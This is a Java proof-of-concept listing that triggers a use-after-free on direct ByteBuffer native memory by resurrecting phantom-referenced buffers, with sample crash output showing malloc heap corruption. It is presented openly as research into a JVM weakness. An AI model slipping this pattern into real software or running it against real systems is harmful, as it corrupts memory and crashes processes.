ByteBufferUseAfterFree
import java.nio.ByteBuffer; | |
import java.util.ArrayList; | |
import java.util.List; | |
// Sub-optimal, almost-reliable proof-of-concept JVM crasher.
// See http://wouter.coekaerts.be/2015/resurrecting-phantomreference
/**
 * Demonstrates a use-after-free on the native memory behind a direct {@link ByteBuffer}.
 *
 * <p>Each round obtains a buffer that, per the original author's notes, still points at memory
 * that has already been released, and then writes zeros through every such buffer collected so
 * far. The loop has no normal exit: it runs until the process dies. The sample output published
 * with this listing shows the native allocator reporting a freed object that was modified after
 * being freed.
 *
 * <p>{@code Necromancer} is defined outside this listing; see the write-up at
 * http://wouter.coekaerts.be/2015/resurrecting-phantomreference for the mechanism.
 * NOTE(review): whether the underlying reference-resurrection behaviour still exists depends on
 * the JVM in use; confirm against the runtime under test.
 */
public class ByteBufferUseAfterFree {
    /** Capacity in bytes of every direct buffer allocated, and of every zero-filled write. */
    private static final int SIZE = 100_000;

    /**
     * Collects stale buffers indefinitely and rewrites all of them after each new one arrives.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final List<ByteBuffer> staleBuffers = new ArrayList<>();
        for (;;) { // no exit condition: the run ends only when the JVM goes down
            // One more buffer whose backing memory has reportedly been freed already.
            final ByteBuffer newest = getFreedBuffer(SIZE);
            staleBuffers.add(newest);

            // Write through every stale buffer gathered so far; a fresh array is allocated for
            // each write, exactly as in the original.
            for (int i = 0; i < staleBuffers.size(); i++) {
                final ByteBuffer stale = staleBuffers.get(i);
                stale.clear();
                stale.put(new byte[SIZE]);
            }
        }
    }

    /**
     * Allocates a direct buffer of {@code size} bytes and returns whatever the
     * {@code Necromancer} helper hands back for it.
     *
     * @param size capacity in bytes of the direct buffer to allocate
     * @return the buffer returned by {@code Necromancer.waitForDeathAndResurrect()}
     */
    private static ByteBuffer getFreedBuffer(int size) {
        System.out.print('.'); // progress marker, one dot per buffer
        // The allocation stays inline on purpose: presumably the helper waits for the buffer to
        // become unreachable, and a local variable holding it could keep it reachable.
        return new Necromancer<ByteBuffer>(ByteBuffer.allocateDirect(size))
                .waitForDeathAndResurrect();
    }
}
........java(18061,0x10b5aa000) malloc: *** error for object 0x7f913107e208: incorrect checksum for freed object - object was probably modified after being freed. | |
*** set a breakpoint in malloc_error_break to debug |